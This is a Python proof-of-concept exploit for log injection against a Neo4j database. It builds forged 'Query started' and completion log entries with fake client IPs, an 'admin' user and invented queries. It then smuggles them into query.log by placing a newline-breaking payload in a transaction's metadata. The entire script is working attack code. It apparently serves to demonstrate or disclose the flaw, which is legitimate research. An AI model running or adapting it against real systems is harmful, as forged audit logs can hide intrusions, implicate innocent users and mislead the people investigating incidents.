#!/usr/bin/env python3 """ Log Injection Proof of Concept ============================== Usage: python log_injection_poc.py [--uri URI] [--user USER] [--password PASS] python log_injection_poc.py --uri bolt://192.168.1.100:7687 --password secret """ import argparse from datetime import datetime from neo4j import GraphDatabase def create_fake_query_started(timestamp: str, query_id: str, tx_id: str, client_ip: str, user: str, query: str, driver: str) -> str: """Create a fake 'Query started:' log entry.""" return ( f"{timestamp}+0000 INFO Query started: id:{query_id} - transaction id:{tx_id} - " f"0 ms: (planning: 0, waiting: 0) - 0 B - 0 page hits, 0 page faults - " f"bolt-session\tbolt\t{driver}\t\tclient/{client_ip}\tserver/127.0.0.1:7687>\t" f"neo4j - {user} - {query} - {{}} - runtime=null - {{}}" ) def create_fake_completion(timestamp: str, query_id: str, tx_id: str, client_ip: str, user: str, query: str, driver: str, duration_ms: int = 1) -> str: """Create a fake query completion log entry.""" return ( f"{timestamp}+0000 INFO id:{query_id} - transaction id:{tx_id} - " f"{duration_ms} ms: (planning: 0, waiting: 0) - 312 B - 1 page hits, 0 page faults - " f"bolt-session\tbolt\t{driver}\t\tclient/{client_ip}\tserver/127.0.0.1:7687>\t" f"neo4j - {user} - {query} - {{}} - runtime=pipelined - {{}}" ) def main(): parser = argparse.ArgumentParser(description="Log Injection PoC - Clean Fake Entries") parser.add_argument("--uri", default="bolt://127.0.0.1:7687", help="Neo4j URI (default: bolt://127.0.0.1:7687)") parser.add_argument("--user", default="neo4j", help="Neo4j username (default: neo4j)") parser.add_argument("--password", default="password123", help="Neo4j password (default: password123)") args = parser.parse_args() print("="*40) print("LOG INJECTION PoC") print("="*40) print(f"Target: {args.uri}") print(f"User: {args.user}") print() timestamp = datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3] # Realistic driver string driver_string = "neo4j-python/6.0.3 Python/3.13.9-final-0 (linux)" # Multiple fake queries to inject - each with unique tx_id to avoid analyzer confusion fake_queries = [ { "id": "700", "tx_id": "100", "ip": "10.0.0.1:1337", "user": "neo4j", "query": "MATCH (n:FakeQuery1) RETURN n LIMIT 1" }, { "id": "701", "tx_id": "101", "ip": "192.168.1.50:4444", "user": "admin", "query": "MATCH (n:FakeQuery2) RETURN n LIMIT 1" }, ] # Build payload with complete fake entries (both start and completion) # Real queries have: Query started + completion, so we inject both payload = "'\n" # Close the quote from {x: ' and start new line # Add Query started entries for fq in fake_queries: payload += create_fake_query_started( timestamp, fq["id"], fq["tx_id"], fq["ip"], fq["user"], fq["query"], driver_string ) + "\n" # Add completion entries (no newline after last one to minimize '} artifact) for i, fq in enumerate(fake_queries): entry = create_fake_completion( timestamp, fq["id"], fq["tx_id"], fq["ip"], fq["user"], fq["query"], driver_string, duration_ms=i+1 ) if i < len(fake_queries) - 1: payload += entry + "\n" else: payload += entry # Last entry - '} will append on same line print("Injecting fake log entries...") print("-" * 40) for fq in fake_queries: print(f" • {fq['user']}@{fq['ip']}: {fq['query'][:50]}...") print("-" * 40) try: driver = GraphDatabase.driver(args.uri, auth=(args.user, args.password)) # Query BEFORE injection (for comparison in logs) - real query 1 with driver.session() as session: tx = session.begin_transaction() tx.run("MATCH (n:RealQuery) RETURN n LIMIT 1").consume() tx.commit() print(" Executed: MATCH (n:RealQuery) RETURN n LIMIT 1 (real)") # The injection query with fake log entries with driver.session() as session: tx = session.begin_transaction(metadata={"x": payload}) tx.run("RETURN 1") tx.commit() print(" Executed: RETURN 1 (with injected fake entries)") driver.close() print() print("="*40) print("Check query.log") return 0 except Exception as e: print(f"[ERROR] Failed: {e}") return 1 if __name__ == "__main__": exit(main())